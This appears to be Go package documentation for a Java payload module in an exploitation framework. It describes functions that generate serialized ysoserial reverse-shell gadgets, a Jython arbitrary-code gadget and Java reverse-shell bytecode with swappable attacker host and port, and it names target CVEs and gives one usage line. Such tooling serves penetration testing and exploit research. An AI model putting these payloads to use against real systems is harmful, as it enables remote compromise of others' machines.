Documentation ¶
Index ¶
Constants ¶
This section is empty.
Variables ¶
This section is empty.
Functions ¶
func CreateBeanutilsReverseShell ¶
This is a serialized java reverse shell. The gadget was generated by ysoserial but using the code in this pull https://github.com/frohoff/ysoserial/pull/96 and updated to make it easy to swap in the desired lhost+lport of our choosing without having to recreate the gadget.
The gadget works on both Windows and Linux and will automatically detect the platform and tool to use for executing commands (cmd.exe or /bin/bash).
func CreateJythonRunCodeGadget ¶ added in v1.1.0
This function generates a serialized Jython payload that executes arbitrary Python. It's the "runcode" variation of Steven Seeley and Rocco Calvi's Jython2:
https://github.com/frohoff/ysoserial/pull/200/files
The payload can be used like so:
java.CreateJythonRunCodeGadget(payload.UnflattenedSecureReversePython27(conf.Lhost, conf.Lport))
The payload was serialized and tested on Java 11.
func ReverseShellBytecode ¶ added in v1.8.1
This is the Java bytecode for a reverse shell. You can find the source code here:
https://gist.github.com/j-baines/38eb6d16eed64986a369f7f981f57508
The code checks if the victim is Windows or Linux and uses bash or cmd.exe accordingly. The use case for this is when remotely loading a class (see CVE-2020-7961) or loading a class from a byte string (see CVE-2023-22527).
The bytecode was generated using OpenJDK 1.8.0. The exact method of generation follows:
albinolobster@mournland:/tmp/java$ java -version openjdk version "1.8.0_392" OpenJDK Runtime Environment (build 1.8.0_392-8u392-ga-1~20.04-b08) OpenJDK 64-Bit Server VM (build 25.392-b08, mixed mode) albinolobster@mournland:/tmp/java$ javac ABCDEFG.java albinolobster@mournland:/tmp/java$ ls -l ABCDEFG.class -rw-rw-r-- 1 albinolobster albinolobster 2129 Feb 17 06:08 ABCDEFG.class
This function replaces hardcoded IP address and port in the bytecode and generates a random class name. The return values are (bytecode, classname).
func ReverseShellScriptingEngineBytecode ¶ added in v1.26.0
This is the Java bytecode for a reverse shell. You can find the source code here:
https://gist.github.com/j-shomo/053031f2ee9ba7f29fca2305c6ea8c6a
The code checks if the victim is Windows or Linux and uses bash or cmd.exe accordingly. The use case for this is when remotely loading a class via ScriptEngineManager calling URLClassLoader (see CVE-2024-37084)
The bytecode was generated using OpenJDK 1.8.0. The exact method of generation follows:
parallels@ubuntu-linux-22-04-02-desktop:~/Downloads$ java -version openjdk version "1.8.0_422" OpenJDK Runtime Environment (build 1.8.0_422-8u422-b05-1~22.04-b05) OpenJDK 64-Bit Server VM (build 25.422-b05, mixed mode) parallels@ubuntu-linux-22-04-02-desktop:~/Downloads$ javac Reverse.java parallels@ubuntu-linux-22-04-02-desktop:~/Downloads$ ls -l Reverse.class -rw-rw-r-- 1 parallels parallels 3124 Sep 20 12:58 Reverse.class
This function replaces hardcoded IP address and port in the bytecode and generates a random class name. The return values are (bytecode, classname).
Types ¶
This section is empty.